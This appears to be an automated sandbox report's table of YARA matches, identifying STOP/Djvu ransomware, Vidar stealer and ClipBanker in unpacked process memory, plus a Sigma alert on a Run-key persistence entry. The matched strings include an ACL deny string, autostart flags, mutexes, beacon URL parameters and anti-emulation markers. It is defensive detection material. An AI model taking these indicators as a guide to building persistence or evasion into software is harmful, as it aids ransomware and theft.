32.2.mstsca.exe.8a15a0.1.unpack	Windows_Trojan_Clipbanker_787b130b	unknown	unknown	0x6ad:$regex2: 6A 34 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E 66 3B C1 74 19 83 F8 35 74 14 83 F8 36 74 0F 83 F8 37 74 ... 0x735:$regex3: 56 8B F1 56 FF 15 20 40 40 00 83 F8 5F 0F 85 84 00 00 00 6A 38 59 66 39 0E 75 7C 0F B7 46 02 6A 30 5A 83 F8 41 74 37 83 F8 42 74 32 66 3B C2 74 2D 83 F8 31 74 28 83 F8 32 74 23 83 F8 33 74 1E ...
19.2.build2.exe.400000.0.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
19.2.build2.exe.400000.0.unpack	INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation	Detects executables containing potential Windows Defender anti-emulation checks	ditekSHen	0x20df0:$s1: JohnDoe 0x20de8:$s2: HAL9TH
18.2.build2.exe.2d915a0.1.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
18.2.build2.exe.2d915a0.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation	Detects executables containing potential Windows Defender anti-emulation checks	ditekSHen	0x20df0:$s1: JohnDoe 0x20de8:$s2: HAL9TH
9.2.E609.exe.4a115a0.1.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
9.2.E609.exe.4a115a0.1.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x102f28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xc1ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
9.2.E609.exe.4a115a0.1.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfd288:$x1: C:\SystemID\PersonalID.txt 0xfd734:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfd0f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x102f28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfd6ec:$s1: " --AutoStart 0xfd700:$s1: " --AutoStart 0x101348:$s2: --ForNetRes 0x101310:$s3: --Admin 0x101790:$s4: %username% 0x1018b4:$s5: ?pid= 0x1018c0:$s6: &first=true 0x1018d8:$s6: &first=false 0xfd7f4:$s7: delself.bat 0x1017f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x101820:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x101848:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
33.2.E609.exe.400000.0.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
33.2.E609.exe.400000.0.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
33.2.E609.exe.400000.0.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
19.2.build2.exe.400000.0.raw.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
19.2.build2.exe.400000.0.raw.unpack	INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation	Detects executables containing potential Windows Defender anti-emulation checks	ditekSHen	0x221f0:$s1: JohnDoe 0x31f80:$s1: JohnDoe 0x221e8:$s2: HAL9TH
14.2.E609.exe.4a715a0.1.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
14.2.E609.exe.4a715a0.1.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x102f28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xc1ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
14.2.E609.exe.4a715a0.1.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfd288:$x1: C:\SystemID\PersonalID.txt 0xfd734:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfd0f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x102f28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfd6ec:$s1: " --AutoStart 0xfd700:$s1: " --AutoStart 0x101348:$s2: --ForNetRes 0x101310:$s3: --Admin 0x101790:$s4: %username% 0x1018b4:$s5: ?pid= 0x1018c0:$s6: &first=true 0x1018d8:$s6: &first=false 0xfd7f4:$s7: delself.bat 0x1017f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x101820:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x101848:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
31.2.E609.exe.4a815a0.1.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
31.2.E609.exe.4a815a0.1.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x102f28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xc1ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
31.2.E609.exe.4a815a0.1.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfd288:$x1: C:\SystemID\PersonalID.txt 0xfd734:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfd0f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x102f28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfd6ec:$s1: " --AutoStart 0xfd700:$s1: " --AutoStart 0x101348:$s2: --ForNetRes 0x101310:$s3: --Admin 0x101790:$s4: %username% 0x1018b4:$s5: ?pid= 0x1018c0:$s6: &first=true 0x1018d8:$s6: &first=false 0xfd7f4:$s7: delself.bat 0x1017f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x101820:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x101848:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
25.2.E609.exe.4a715a0.1.raw.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
25.2.E609.exe.4a715a0.1.raw.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
25.2.E609.exe.4a715a0.1.raw.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
15.2.E609.exe.400000.0.raw.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
15.2.E609.exe.400000.0.raw.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x105b28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xd9ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
15.2.E609.exe.400000.0.raw.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
18.2.build2.exe.2d915a0.1.unpack	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
18.2.build2.exe.2d915a0.1.unpack	INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation	Detects executables containing potential Windows Defender anti-emulation checks	ditekSHen	0x201f0:$s1: JohnDoe 0x201e8:$s2: HAL9TH
16.2.E609.exe.49e15a0.1.raw.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
16.2.E609.exe.49e15a0.1.raw.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
16.2.E609.exe.49e15a0.1.raw.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
33.2.E609.exe.400000.0.raw.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
33.2.E609.exe.400000.0.raw.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x105b28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xd9ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
33.2.E609.exe.400000.0.raw.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
10.2.E609.exe.400000.0.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
10.2.E609.exe.400000.0.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
10.2.E609.exe.400000.0.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
17.2.E609.exe.400000.0.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
17.2.E609.exe.400000.0.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
17.2.E609.exe.400000.0.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
31.2.E609.exe.4a815a0.1.raw.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
31.2.E609.exe.4a815a0.1.raw.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
31.2.E609.exe.4a815a0.1.raw.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
10.2.E609.exe.400000.0.raw.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
10.2.E609.exe.400000.0.raw.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x105b28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xd9ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
10.2.E609.exe.400000.0.raw.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
9.2.E609.exe.4a115a0.1.raw.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
9.2.E609.exe.4a115a0.1.raw.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
9.2.E609.exe.4a115a0.1.raw.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
17.2.E609.exe.400000.0.raw.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
17.2.E609.exe.400000.0.raw.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x105b28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xd9ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
17.2.E609.exe.400000.0.raw.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
14.2.E609.exe.4a715a0.1.raw.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
14.2.E609.exe.4a715a0.1.raw.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
14.2.E609.exe.4a715a0.1.raw.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
27.2.E609.exe.400000.0.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
27.2.E609.exe.400000.0.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
27.2.E609.exe.400000.0.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
25.2.E609.exe.4a715a0.1.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
25.2.E609.exe.4a715a0.1.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x102f28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xc1ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
25.2.E609.exe.4a715a0.1.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfd288:$x1: C:\SystemID\PersonalID.txt 0xfd734:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfd0f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x102f28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfd6ec:$s1: " --AutoStart 0xfd700:$s1: " --AutoStart 0x101348:$s2: --ForNetRes 0x101310:$s3: --Admin 0x101790:$s4: %username% 0x1018b4:$s5: ?pid= 0x1018c0:$s6: &first=true 0x1018d8:$s6: &first=false 0xfd7f4:$s7: delself.bat 0x1017f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x101820:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x101848:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
16.2.E609.exe.49e15a0.1.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
16.2.E609.exe.49e15a0.1.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x102f28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xc1ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
16.2.E609.exe.49e15a0.1.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfd288:$x1: C:\SystemID\PersonalID.txt 0xfd734:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfd0f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x102f28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfd6ec:$s1: " --AutoStart 0xfd700:$s1: " --AutoStart 0x101348:$s2: --ForNetRes 0x101310:$s3: --Admin 0x101790:$s4: %username% 0x1018b4:$s5: ?pid= 0x1018c0:$s6: &first=true 0x1018d8:$s6: &first=false 0xfd7f4:$s7: delself.bat 0x1017f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x101820:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x101848:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
15.2.E609.exe.400000.0.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
15.2.E609.exe.400000.0.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x104528:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xcdef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
15.2.E609.exe.400000.0.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xfe888:$x1: C:\SystemID\PersonalID.txt 0xfed34:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xfe6f0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x104528:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0xfecec:$s1: " --AutoStart 0xfed00:$s1: " --AutoStart 0x102948:$s2: --ForNetRes 0x102910:$s3: --Admin 0x102d90:$s4: %username% 0x102eb4:$s5: ?pid= 0x102ec0:$s6: &first=true 0x102ed8:$s6: &first=false 0xfedf4:$s7: delself.bat 0x102df8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x102e20:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x102e48:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
27.2.E609.exe.400000.0.raw.unpack	JoeSecurity_Djvu	Yara detected Djvu Ransomware	Joe Security
27.2.E609.exe.400000.0.raw.unpack	Windows_Ransomware_Stop_1e8d48ff	unknown	unknown	0x105b28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb 0xd9ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
27.2.E609.exe.400000.0.raw.unpack	MALWARE_Win_STOP	Detects STOP ransomware	ditekSHen	0xffe88:$x1: C:\SystemID\PersonalID.txt 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC) 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\ 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\ 0x1002ec:$s1: " --AutoStart 0x100300:$s1: " --AutoStart 0x103f48:$s2: --ForNetRes 0x103f10:$s3: --Admin 0x104390:$s4: %username% 0x1044b4:$s5: ?pid= 0x1044c0:$s6: &first=true 0x1044d8:$s6: &first=false 0x1003f4:$s7: delself.bat 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D} 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1} 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
Click to see the 85 entries

Sigma Signatures

System Summary

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe" --AutoStart, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\E609.exe, ProcessId: 7048, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SysHelper

